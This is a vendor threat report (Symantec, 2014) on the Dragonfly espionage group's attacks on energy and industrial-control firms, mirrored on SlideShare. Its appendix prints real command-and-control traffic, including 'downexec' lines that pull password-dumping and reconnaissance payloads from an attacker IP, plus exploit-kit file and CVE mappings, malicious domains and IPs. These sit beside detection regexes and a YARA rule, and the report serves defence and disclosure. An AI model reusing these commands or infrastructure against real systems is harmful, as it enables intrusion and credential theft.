SlideShare uma empresa Scribd logo
1 de 18
Baixar para ler offline
SECURITY RESPONSE
Dragonfly initially targeted defense and aviation companies
in the US and Canada before shifting its focus to US and
European energy firms in early 2013.
Dragonfly: Cyberespionage Attacks
Against Energy Suppliers
Symantec Security Response
Version 1.21: July 7, 2014, 12:00 GMT
CONTENTS
OVERVIEW...................................................................... 3
Timeline.......................................................................... 5
Victims........................................................................... 5
Tools and tactics............................................................ 6
Spam campaign........................................................ 6
Watering hole attacks.............................................. 6
Trojanized software.................................................. 7
Source time zone........................................................... 7
Conclusion...................................................................... 8
Appendix - Technical Description................................ 10
Lightsout exploit kit............................................... 10
Backdoor.Oldrea..................................................... 11
Registry modifications........................................... 11
Trojan.Karagany..................................................... 13
Indicators of compromise............................................ 15
Lightsout exploit kit .............................................. 15
Backdoor.Oldrea .................................................... 16
Trojan.Karagany ..................................................... 17
A cyberespionage campaign against a range of targets, mainly in the energy sector, gave
attackers the ability to mount sabotage operations against their victims. The attackers,
known to Symantec as Dragonfly, managed to compromise a number of strategically
important organizations for spying purposes and, if they had used the sabotage capabilities
open to them, could have caused damage or disruption to the energy supply in the affected
countries.
The Dragonfly group, which is also known by other vendors as Energetic Bear, are a capable
group who are evolving over time and targeting primarily the energy sector and related
industries. They have been in operation since at least 2011 but may have been active even
longer than that. Dragonfly initially targeted defense and aviation companies in the US
and Canada before shifting its focus to US and European energy firms in early 2013. More
recent targets have included companies related to industrial control systems.
Dragonfly has used spam email campaigns and watering hole attacks to infect targeted
organizations. The group has used two main malware tools: Trojan.Karagany and
Backdoor.Oldrea. The latter appears to be a custom piece of malware, either written by
or for the attackers.
OVERVIEW
A newer approach
used by the attackers
involves
compromising the
update site for several
industrial control
system (ICS) software
producers.
TIMELINE
Page 5
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Timeline
Symantec observed spear phishing attempts in the form of emails with PDF attachments from February 2013
to June 2013. The email topics were related to office administration issues such as dealing with an account or
problems with a delivery. Identified targets of this campaign were mainly US and UK organizations within the
energy sector.
In May 2013, the attackers began to use the Lightsout exploit kit as an attack vector, redirecting targets from
various websites. The use of the Lightsout exploit kit has continued to date, albeit intermittently. The exploit kit
has been upgraded over time with obfuscation techniques. The updated version of Lightsout became known as
the Hello exploit kit.
A newer approach used by the attackers involves compromising the update site for several industrial control
system (ICS) software producers. They then bundle Backdoor.Oldrea with a legitimate update of the affected
software. To date, three ICS software producers are known to have been compromised.
The Dragonfly attackers used hacked websites to host command-and-control (C&C) software.
Compromised websites appear to consistently use some form of content management system.
Victims
The current targets of the Dragonfly group,
based on compromised websites and hijacked
software updates, are the energy sector and
industrial control systems, particularly those
based in Europe. While the majority of victims
are located in the US, these appear to mostly
be collateral damage. That is, many of these
computers were likely infected either through
watering hole attacks or update hijacks and
are of no interest to the attacker.
By examining victims with active infections –
where additional malicious activity has been
detected – it is possible to gather a more
accurate picture of ‘true’ victims.
The most active infections, as in Figure 2, are
Figure 1. Timeline of Dragonfly operations
Figure 2. Top 10 countries by active infection
Page 6
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
in Spain, followed in order by the US, France, Italy, and Germany.
Tools and tactics
Dragonfly uses two main pieces of malware in its attacks. Both are Remote Access Tool (RAT) type malware
which provide the attackers with access and control of compromised computers. Dragonfly’s favored malware
tool is Backdoor.Oldrea, which is also known as Havex or the Energetic Bear RAT. Oldrea acts as a back door for
the attackers on to the victim’s computer, allowing them to extract data and install further malware.
Oldrea appears to be custom malware, either written by the group itself or created for it. This provides some
indication of the capabilities and resources behind the Dragonfly group. The second main tool used by Dragonfly
is Trojan.Karagany. Unlike Oldrea, Karagany was available on the underground market. The source code for
version 1 of Karagany was leaked in 2010. Symantec believes that Dragonfly may have taken this source code
and modified for its own use.
Symantec found that the majority of computers compromised by the attackers were infected with Oldrea.
Karagany was only used in around 5 percent of infections. The two pieces of malware are similar in functionality
and what prompts the attackers to choose one tool over another remains unknown.
Spam campaign
The Dragonfly group has
used at least three infection
tactics against targets in the
energy sector. The earliest
method was an email spear
phishing campaign, which saw
selected executives and senior
employees in target companies
receive emails containing a
malicious PDF attachment.
Infected emails had one of two
subject lines: “The account”
or “Settlement of delivery
problem”. All of the emails were
from a single Gmail address.
Figure 3 displays the number of
different recipients per day.
The spam campaign began in
February 2013 and continued
into June 2013. Symantec
identified seven different
organizations targeted in this
campaign. At least one organization was attacked intermittently for a period of 84 days.
Watering hole attacks
In June 2013, the attackers shifted their focus to watering hole attacks. They compromised a number of energy-
related websites and injected an iframe into each of them. This iframe then redirected visitors to another
compromised legitimate website hosting the Lightsout exploit kit. This in turn exploited either Java or Internet
Explorer in order to drop Oldrea or Karagany on the victim’s computer. The fact that the attackers compromised
multiple legitimate websites for each stage of the operation is further evidence that the group has strong
technical capabilities.
Figure 3. Spam campaign activity from mid-February 2014 to mid-June 2013
Page 7
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
In September 2013,
Dragonfly began using
a new version of this
exploit kit, known as the
Hello exploit kit. The
landing page for this kit
contains JavaScript which
fingerprints the system,
identifying installed
browser plugins. The
victim is then redirected
to a URL which in turn
determines the best
exploit to use based on
the information collected.
Figure 4 shows the
compromised websites
categorized into their
respective industries.
Fifty percent of identified
targets were energy
industry related and
thirty percent were
energy control systems, as shown in Figure 4. A clear shift in the attackers targeting can be seen in March 2014
when energy control systems become the primary target.
Trojanized software
The most ambitious attack vector used by Dragonfly was the compromise of a number of legitimate software
packages. Three different ICS equipment providers were targeted and malware was inserted into the software
bundles they had made available for download on their websites.
Source time zone
Analysis of the compilation timestamps
on the malware used by the attackers
indicate that the group mostly worked
between Monday and Friday, with activity
mainly concentrated in a nine-hour period
that corresponded to a 9am to 6pm
working day in the UTC +4 time zone.
Figure 5. Number of samples compiled per hour, UTC time zone
Figure 4. Targeted industries over time
Page 8
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Conclusion
The Dragonfly group is technically adept and able to think strategically. Given the size of some of its targets, the
group found a “soft underbelly” by compromising their suppliers, which are invariably smaller, less protected
companies.
Figure 6. Number of samples compiled per day, UTC time zone
APPENDIX
Page 10
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Appendix - Technical Description
Identification of this group is based on the use of two malware families and an exploit kit. The malware families
utilized are Backdoor.Oldrea and Trojan.Karagany. The exploit kit is known as Lightsout and/or Hello. Hello is an
updated iteration of Lightsout that the Dragonfly group began to use in September 2013.
Use of Backdoor.Oldrea appears to be limited to the Dragonfly group. In addition, specific instances of Trojan.
Karagany have been used by this group. Karagany is a Russian RAT sold on underground forums. Instances of
this malware related to the Dragonfly group are identified based on them being delivered through the Lightsout
exploit kit and also a particular packer that this group used. Symantec detects the Trojan.Karagany packer used
by this group as Trojan.Karagany!gen1.
The Lightsout exploit kit is a simple exploit kit that is consistently used to deliver primarily Backdoor.Oldrea and,
in several instances, Trojan.Karagany.
Lightsout exploit kit
A number of sites that use content
management systems were exploited and
an iframe was used in order to redirect
visitors to sites hosting the Lightsout
exploit kit.
An example of an injected iframe can be
seen in figure 7.
The exploit kit uses browser (e.g.
Internet Explorer and Firefox) and Java
exploits in order to deliver either Backdoor.Oldrea or Trojan.Karagany.
An example of the structure of the Lightsout exploit kit can be seen Table 1. Note that file names and exploits
used may vary.
In September 2013, the
Dragonfly group began
using a new version of
Lightsout, also known
as the Hello exploit kit.
The JavaScript included
in the landing page
redirects the browser
to a URL that depends
on the fonts installed
on the system, browser
add-ons, the OS version,
and the user agent. At
this point, it determines
the best exploit to
use, based on the
information provided, and generates an appropriate URL to redirect the user to the appropriate exploit/payload.
The following shows an example of such a request:
[http://]compromised.example/wp-includes/pomo/
dtsrc.php?a=[EK _ DETERMINED _ PARAMETER]
Figure 7. Example of injected iframe link
Table 1. Examples of file names for one implementation of the Lightsout exploit kit
Page Description CVE
Inden2i.php First landing page N/A
Inden2i.html Second landing page N/A
PluginDetect.js PluginDetect script N/A
Stoh.html Java 6 exploit Jar request file N/A
Stoh.jar Java 6 Exploit CVE-2012-1723
Gami.html Java 7 exploit Jar request file N/A
Gami.jar Java 7 exploit CVE-2013-2465
Tubc.html IE7 Exploit CVE-2012-4792
Negc.html IE8 Exploit CVE-2013-1347
Page 11
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
[EK_DETERMINED_PARAMETER] may be anything
listed in Table 2.
The parameters dwe and dwd relate to which
payload is requested for download, for example:
•	 When a Backdoor.Oldrea payload is requested
[EK_DETERMINED_PARAMETER] is dwd
•	 When a Karagany!gen1 payload is requested
[EK_DETERMINED_PARAMETER] is dwe
The values of the [EK_DETERMINED_PARAMETER]
variable may relate to the two different file types
represented by Backdoor.Oldrea and Trojan.
Karagany!gen1 payloads. Oldrea payloads are DLL
files (URLs end in “d” for DLL?) while Karagany!gen1
payloads are portable executables (URLs end in “e”
for EXE?).
Backdoor.Oldrea
At the core of Backdoor.Oldrea is a persistent component that interacts with C&C servers to download and
execute payloads. The components are downloaded by reaching out to the C&C server and performing a GET
request which returns an HTML page containing a base64 encoded string between two comments marked with
the ‘havex’ string.
Installation
File system modifications
•	 %Temp%qln.dbx
•	 %System%TMPprovider038.dll
Registry modifications
In this specific example, the ‘038’ in the file name indicates the major version number.
•	 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”TmProvider”
•	 HKEY_LOCAL_MACHINE SOFTWAREMicrosoftWindowsCurrentVersionRun”TmProvider”
•	 HKEY_LOCAL_MACHINE SOFTWAREMicrosoftInternet ExplorerInternetRegistry”fertger”
•	 HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerInternetRegistry
Code injection
•	 Backdoor.Oldrea injects code into explorer.exe.
Networking
Post infection, Backdoor.Oldrea will attempt to collect system information such as OS, user name, computer
name, country, language, nation, Internet adapter configuration information, available drives, default browser,
running processes, desktop file list, My Documents, Internet history, program files, and root of available drives.
It also collects data from Outlook (address book) and ICS related software configuration files. This data is
collected and written to a temporary file in an encrypted form before it is POST’ed to a remote C&C server. The
following are examples of a POST request and a POST response:
Table 2. Lightsout exploit kit parameters
Page Description
H2 Java Exploit (<v1.7.17)
H3 Chrome /w Java (<1.7.17)
H4 IE6 & OSVer < Vista – 6
H5 Java Exploit (<v1.7.17 & OSver < Vista)
H6 IE8 & OSVer < Vista
H7 Java Exploit (<=v1.6.32)
R2 Malicious JAR file
R7 Malicious JAR file
Dwe Malicious PE file
Dwd Malicious PE file
Page 12
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
POST request example:
POST /wp08/wp-includes/dtcla.php?id=285745296322896178920098FD80-20&v1=038&v2=17
0393861&q=5265882854508EFCF958F979E4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19
(KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19
Host: toons.freesexycomics.com
Content-Length: 0
Cache-Control: no-cache
POST response example:
HTTP/1.1 200 OK
Date: Wed, 22 Jan 2014 13:40:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache
9f65
<html><head><mega http-equiv=’CACHE-CONTROL’ content=’NO-CACHE’></
head><body>No data!<!--havexQlpoOTFBWSZTWWYvDI0BOsD////////////////////////////////////
/////////4oB+93VVXu69DuN7XYzds9yt49Ques
[...TRUNCATED FOR READABILITY]
+yUW3zfTxWAOstsCwCckdW5 AH5Q6vbbCu7GputPt5CSfgPCAKXcAOOICMsqliACGYEhAQT3v9eD
M92D/8XckU4UJBmLwyNA==havex--></body></head>
Various samples process the C&C responses differently.
In one example, the sample searches for the data enclosed by the tag ‘havex’. Once the data is found, it is
decoded using standard base64 + bzip2 and also a xor layer with bytes from the string 1312312. The decoded
data contains a small header followed by an executable MZ-file.
Another sample was found to use standard base64 + reverse xor + RSA-2048 for decrypting received data. The
decrypted data consists of a 6 byte command concatenated with an MZ file. The MZ file is compressed with the
lzma algorithm. RSA keys for decryption, together with other initial configuration information, are stored in the
registry in base64 form.
Payloads
This section includes information about identified payloads downloaded by Backdoor.Oldrea.
The following is a brief description of the functionality for each identified component:
•	 Tmpprovider is a persistent component that interacts with the C&C server (downloads and executes payloads).
•	 The InstallerFormDll component usually embeds another executable (DLL) in its resource section to be
loaded. The sample analyzed carried a Web browser password recovery tool originating from
http://securityxploded.com/browser-password-decryptor.php
•	 The RunExeCmdSingle component is a DLL file that drops and executes another executable. The export
‘runDll’ of this file is where the logic is implemented.
•	 DropCommandsCmd is a cleanup module, used to remove traces of itself from the infected computer.
•	 The GetFileCmd modules check for the existence of specific files on the infected host. The two samples look
for the ICS related software file and Outlook’s autocomplete address book file (outlook.nk2).
Page 13
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Trojan.Karagany
Trojan.Karagany is a back door used primarily for recon. It is designed to download and install additional files
and exfiltrate data. Samples sometimes use common binary packers such as UPX and Aspack on top of a custom
Delphi binary packer/protector for the payload. Where present in samples, the Delphi packer is configured to use
‘neosphere’ as a key to decrypt the payload.
The following is a brief overview of the functionality of Trojan.Karagany:
•	 Can upload, download, and execute files on the system
•	 Has plugin capability (may load several plugins for added functionality, such as Web injects)
•	 Payload is approximately 72Kb in size and is programmed in C/C++
•	 Contains a small embedded DLL file, which monitors WSASend and send APIs for capturing ‘Basic
Authentication’ credentials
Installation
Trojan.Karagany creates a folder in the user APPDATA directory and chooses the directory name from the
following list:
•	 Microsoft WCF services
•	 Broker services
•	 Flash Utilities
•	 Media Center Programs
•	 Policy Definitions
•	 Microsoft Web Tools
•	 Reference Assemblies
•	 Analysis Services
•	 InstallShield Information
•	 IIS SQL Server
•	 Diagnostics
•	 NTAPI Performance
•	 WPF Platform
It copies itself in the created directory with hidden and system attributes using a file name chosen from the
following list:
•	 SearchIndexer.exe
•	 ImeBroker.exe
•	 fsutil.exe
•	 PnPutil.exe
•	 BdeUISrv.exe
•	 WinSAT.exe
•	 pwNative.exe
•	 SnippingTool.exe
•	 DFDWizard.exe
•	 PrintBrmEngine.exe
•	 WbemMonitor.exe
•	 dxpserver.exe
•	 PowerMng.exe
Page 14
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Trojan.Karagany copies itself with hidden and system attributes where it was first executed as err.log[DIGITS]. It
then copies the legitimate chkdsk utility in the installation folder using the payload file name but with a space before
the file extension. This may fool ordinary users into thinking that this folder contains a legitimate application, for
example PnPutil .exe. Trojan.Karagany!gen1 may create the following additional files in the installation folder:
•	 Form.api
•	 inact.api
•	 prog.cer
•	 Cent.api
•	 ie.pdb
It then creates a C:ProgramDataMailMailAggl directory as a temporary directory used for uploading files.
Trojan.Karagany then creates a link to itself in the Startup folder as an autostart when the system restarts.
Networking
Trojan.Karagany first checks for a live Internet connection by visiting Microsoft or Adobe websites. It will only reach
out to its C&C server once this check is successful.
Example HTTP Requests
Internet connection test to Microsoft
GET /en-us/default.aspx HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Host: microsoft.com
Cookie: MC1=V=3&GUID=<32 character guid>
Connection: Keep-Alive
Cache-control: no-cache
Internet connection test to Adobe using identifiant parameter
POST /geo/productid.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: adobe.com
...
identifiant=51032 _ 175129256364
Example POST request for C&C server check-in
POST /check _ value.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR
2.0.50727)
Host: 93.188.161.235
...
identifiant=51032 _ 1799883375637&version=i2pver
HTTP response example
HTTP/1.1 200 OK
Date: Tue, 28 Jan 2014 05:59:58 GMT
Vary: Accept-Encoding
Content-Length: 324
Content-Type: text/html
X-Powered-By: PHP/5.3.10-1ubuntu3.9
Via: 1.1 host.alexsieff.com
work:3|downexec [http://]93.188.161.235/check2/muees27jxt/shot.jpg;
work:5|downexec [http://]93.188.161.235/check2/muees27jxt/tl.jpg;
work:7|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
work:103|downexec [http://]93.188.161.235/check2/muees27jxt/pdump.jpg;
work:118|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
Page 15
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
The POST data contains the operating system version and a derived number:
•	 identifiant=[OS VERSION]_[DERIVED NUMBER]
User-Agent tokens used in C&C requests are hard-coded. The following two examples have been observed:
•	 Mozilla/17.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)
•	 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729)
Downloaded components
•	 pdump.jpg - Used for dumping passwords into ProgramDataMailMailAgpwds.txt. Needs ‘vaultcli.dll’ library
•	 fl.txt - Used for listing RTF, PST, DOC, XLS, PDF, *pass*.*, *secret*.* files into ProgramDataMailMailAgfls.txt
•	 tl.jpg - Used to list running task using ‘tasklist’ utility
•	 shot.jpg - Used for desktop screenshot, file is saved into ProgramDataMailMailAgshot.png
Indicators of compromise
Lightsout exploit kit
Watering holes
Table 3. Detected exploit sites hosting the Lightsout exploit kit and referrer
Infected website Infected website
industry
Infected
website
nationality
Exploit site Last Seen
www.s[REDACTED]e.az File hosting service Azerbaijan blog.olioboard.com 18/06/2014 01:19
www.t[REDACTED]e.no Energy control systems Norwegian www.manshur.ir 24/05/2014 10:53
www.s[REDACTED]e.az File hosting service Azerbaijan realstars.ir 06/05/2014 22:20
s[REDACTED]e.az File hosting service Azerbaijan realstars.ir 06/05/2014 23:30
www.f[REDACTED]y.com Energy American aptguide.3dtour.com 11/04/2014 12:26
www.t[REDACTED]e.no Energy control systems Norwegian seductionservice.com 07/04/2014 06:42
www.a[REDACTED]t.it Energy control systems Italian seductionservice.com 06/04/2014 22:25
www.e[REDACTED]t.it Energy control systems Italian seductionservice.com 05/04/2014 22:57
b[REDACTED]n.in Energy control systems Indian mahsms.ir 23/03/2014 23:01
www.v[REDACTED]z.com Energy French mahsms.ir 21/03/2014 22:30
www.r[REDACTED]e.fr Energy French mahsms.ir 14/03/2014 04:30
www.e[REDACTED]m.eu Energy French aptguide.3dtour.com 04/03/2014 21:27
www.r[REDACTED]e.fr Energy French keeleux.com 30/11/2013 06:57
www.v[REDACTED]z.com Energy French keeleux.com 11/10/2013 12:18
Page 16
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Detection for HTTP request of Lightsout payload
Regular expression for URL or HTTP request-line searches:
•	 [^=]*=(dw[de]|fn[de])$
Backdoor.Oldrea
Detection for Oldrea HTTP C&C requests
•	 .php?id=[0-9A-F]{28}.{0,5}&v1=[0-9]{1,5}&v2=[0-9]{1,10}&q=[0-9A-F]{20}
Detection for files created during installation
Regular expression for file system searches:
•	 (TMPprovider[0-9]{3}.dll|sy[ds]main.dll)
Table 4. Recent Oldrea C&C servers detected by Symantec
Hostname First Seen Last Seen
a[REDACTED]e.com 25/02/2014 15:57 23/06/2014 21:06
e[REDACTED]k.ru 25/02/2014 18:47 23/06/2014 20:51
r[REDACTED]r.ru 25/02/2014 15:44 23/06/2014 17:21
l[REDACTED]l.net 25/02/2014 15:54 23/06/2014 12:51
c[REDACTED]b.ru 25/02/2014 22:37 23/06/2014 12:13
l[REDACTED]r.ru 05/03/2014 14:00 22/06/2014 22:06
p[REDACTED]3.ru 11/06/2014 03:34 22/06/2014 06:18
r[REDACTED]a.com 30/04/2014 00:07 17/06/2014 22:57
7[REDACTED]t.com 26/02/2014 09:43 13/06/2014 08:59
s[REDACTED]s.com 29/04/2014 23:43 13/06/2014 02:55
www.r[REDACTED]l.com 05/03/2014 19:18 19/03/2014 17:21
w[REDACTED]c.org 26/02/2014 04:51 11/03/2014 23:30
s[REDACTED]s.com 06/09/2013 04:03 16/01/2014 23:54
s[REDACTED]f.com.ua 14/01/2014 21:46 16/01/2014 22:49
d[REDACTED]k.com 14/01/2014 08:46 16/01/2014 22:48
z[REDACTED]k.com 14/01/2014 21:47 16/01/2014 22:47
blog.o[REDACTED]d.com 19/09/2013 07:12 16/01/2014 22:40
a[REDACTED]l.com 06/09/2013 04:41 16/01/2014 20:52
a[REDACTED]r.com 19/09/2013 01:44 15/01/2014 05:57
k[REDACTED]x.com 20/09/2013 00:22 26/09/2013 04:25
blog.k[REDACTED]x.com 20/09/2013 04:04 25/09/2013 07:57
dl.3[REDACTED]e.com 28/08/2013 06:38 06/09/2013 10:07
j[REDACTED]p.co.jp 28/08/2013 06:33 06/09/2013 09:37
s[REDACTED]e.net 28/08/2013 09:12 06/09/2013 03:54
Page 17
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Registry changes made during installation
•	 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”TmProvider”
•	 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”TmProvider”
Trojan.Karagany
•	 91.203.6.71
•	 93.171.216.118
•	 93.188.161.235
Format of data initial POST request made to C&C server
•	 identifiant=[OS VERSION]_[DERIVED NUMBER]
HTTP requests for uploading data with the format:
•	 filename=[FILE NAME]&identifiant=[INFO DERIVED FROM OS]&fichier=[ENCODED DATA FROM FILE]
Yara rule
Karagany Yara rule:
private rule isPE
{
condition:
uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x00004550
}
rule Trojan _ Karagany
{
meta:	
alias = “Dreamloader”
		
strings:
$s1 = “neosphere” wide ascii
$s2 = “10000000000051200” wide ascii
$v1 = “&fichier” wide ascii
$v2 = “&identifiant” wide ascii
$c1 = “xmonstart” wide ascii
$c2 = “xmonstop” wide ascii
$c3 = “xgetfile” wide ascii
$c4 = “downadminexec” wide ascii
$c5 = “xdiex” wide ascii
$c6 = “xrebootx” wide ascii
condition:
isPE and (($s1 and $s2) or ($v1 and $v2) or (any of ($c*)))
}
About Symantec
Symantec protects the world’s information and is the
global leader in security, backup, and availability solutions.
Our innovative products and services protect people and
information in any environment—from the smallest mobile
device to the enterprise data center to cloud-based systems.
Our industry-leading expertise in protecting data,
identities, and interactions gives our customers confidence
in a connected world. More information is available at
www.symantec.com or by connecting with Symantec at
go.symantec.com/socialmedia.
Headquartered in Mountain View, Calif.,
Symantec has operations in 40 countries.
More information is available at www.symantec.com.
For specific country offices and contact numbers, please visit our website.
Symantec World Headquarters
350 Ellis St.
Mountain View, CA 94043 USA
+1 (650) 527-8000
1 (800) 721-3934
www.symantec.com
Copyright © 2014 Symantec Corporation. All
rights reserved. Symantec, the Symantec Logo,
and the Checkmark Logo are trademarks or
registered trademarks of Symantec Corporation
or its affiliates in the U.S. and other countries.
Other names may be trademarks of their
respective owners.
Any technical information that is made available by Symantec Corporation is the copyrighted work of Symantec Corporation and is owned by Symantec
Corporation.
NO WARRANTY . The technical information is being delivered to you as is and Symantec Corporation makes no warranty as to its accuracy or use. Any use
of the technical documentation or the information contained herein is at the risk of the user. Documentation may include technical or other inaccuracies or
typographical errors. Symantec reserves the right to make changes without prior notice.
Authors
Symantec Security Response


Mais conteúdo relacionado

Mais procurados

CYREN 2013년 인터넷 위협 보고서_영문
CYREN 2013년 인터넷 위협 보고서_영문CYREN 2013년 인터넷 위협 보고서_영문
CYREN 2013년 인터넷 위협 보고서_영문
Jiransoft Korea
 
ChongLiu-MaliciousURLDetection
ChongLiu-MaliciousURLDetectionChongLiu-MaliciousURLDetection
ChongLiu-MaliciousURLDetection
Daniel Liu
 

Mais procurados (20)

RedSocks Malware Trend Report - Q3 2014
RedSocks Malware Trend Report - Q3 2014RedSocks Malware Trend Report - Q3 2014
RedSocks Malware Trend Report - Q3 2014
 
CYREN 2013년 인터넷 위협 보고서_영문
CYREN 2013년 인터넷 위협 보고서_영문CYREN 2013년 인터넷 위협 보고서_영문
CYREN 2013년 인터넷 위협 보고서_영문
 
A Security Analysis Framework Powered by an Expert System
A Security Analysis Framework Powered by an Expert SystemA Security Analysis Framework Powered by an Expert System
A Security Analysis Framework Powered by an Expert System
 
Malware Risk Analysis on the Campus Network with Bayesian Belief Network
Malware Risk Analysis on the Campus Network with Bayesian Belief NetworkMalware Risk Analysis on the Campus Network with Bayesian Belief Network
Malware Risk Analysis on the Campus Network with Bayesian Belief Network
 
Artificial Intelligence powered malware - A Smart virus
Artificial Intelligence powered malware - A Smart virusArtificial Intelligence powered malware - A Smart virus
Artificial Intelligence powered malware - A Smart virus
 
Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet
 
IBM X-Force Threat Intelligence Quarterly 3Q 2014
IBM X-Force Threat Intelligence Quarterly 3Q 2014IBM X-Force Threat Intelligence Quarterly 3Q 2014
IBM X-Force Threat Intelligence Quarterly 3Q 2014
 
Protecting the Oil and Gas Industry from Email Threats
Protecting the Oil and Gas Industry from Email ThreatsProtecting the Oil and Gas Industry from Email Threats
Protecting the Oil and Gas Industry from Email Threats
 
Cloud activ8 state of ransomware report_2021-dec
Cloud activ8 state of ransomware report_2021-decCloud activ8 state of ransomware report_2021-dec
Cloud activ8 state of ransomware report_2021-dec
 
ChongLiu-MaliciousURLDetection
ChongLiu-MaliciousURLDetectionChongLiu-MaliciousURLDetection
ChongLiu-MaliciousURLDetection
 
Secureview 2q 2011
Secureview 2q 2011Secureview 2q 2011
Secureview 2q 2011
 
2013 Threat Report
2013 Threat Report2013 Threat Report
2013 Threat Report
 
Websense 2013 Threat Report
Websense 2013 Threat ReportWebsense 2013 Threat Report
Websense 2013 Threat Report
 
Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0Mobile threat-report-mid-year-2018 en-us-1.0
Mobile threat-report-mid-year-2018 en-us-1.0
 
Using indicators to deal with security attacks
Using indicators to deal with security attacksUsing indicators to deal with security attacks
Using indicators to deal with security attacks
 
M-Trends® 2012: An Evolving Threat
M-Trends® 2012: An Evolving Threat M-Trends® 2012: An Evolving Threat
M-Trends® 2012: An Evolving Threat
 
IJET-V3I2P16
IJET-V3I2P16IJET-V3I2P16
IJET-V3I2P16
 
Resource Allocation for Antivirus Cloud Appliances
Resource Allocation for Antivirus Cloud AppliancesResource Allocation for Antivirus Cloud Appliances
Resource Allocation for Antivirus Cloud Appliances
 
Contending Malware Threat using Hybrid Security Model
Contending Malware Threat using Hybrid Security ModelContending Malware Threat using Hybrid Security Model
Contending Malware Threat using Hybrid Security Model
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection Methods
 

Semelhante a Dragonfly: Cyberespionage Attacks Against Energy Suppliers

Journal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993ConJournal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993Con
karenahmanny4c
 
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docxJournal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
croysierkathey
 
Sophos security-threat-report-2014-na
Sophos security-threat-report-2014-naSophos security-threat-report-2014-na
Sophos security-threat-report-2014-na
Andreas Hiller
 
READING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docx
READING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docxREADING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docx
READING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docx
sodhi3
 
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROID
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROIDHONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROID
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROID
IJCNCJournal
 

Semelhante a Dragonfly: Cyberespionage Attacks Against Energy Suppliers (20)

Dragonfly.pdf
Dragonfly.pdfDragonfly.pdf
Dragonfly.pdf
 
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack Group
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack GroupWHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack Group
WHITE PAPER▶ Symantec Security Response Presents:The Waterbug Attack Group
 
Journal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993ConJournal of Computer and System Sciences 80 (2014) 973–993Con
Journal of Computer and System Sciences 80 (2014) 973–993Con
 
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docxJournal of Computer and System Sciences 80 (2014) 973–993Con.docx
Journal of Computer and System Sciences 80 (2014) 973–993Con.docx
 
Countering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryCountering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep Discovery
 
Symantec Intelligence Quarterly Report - October - December 2010
Symantec Intelligence Quarterly Report - October - December 2010Symantec Intelligence Quarterly Report - October - December 2010
Symantec Intelligence Quarterly Report - October - December 2010
 
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updates
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updatesBriskinfosec - Threatsploit Report Augest 2021- Cyber security updates
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updates
 
Sophos Security Threat Report 2014
Sophos Security Threat Report 2014Sophos Security Threat Report 2014
Sophos Security Threat Report 2014
 
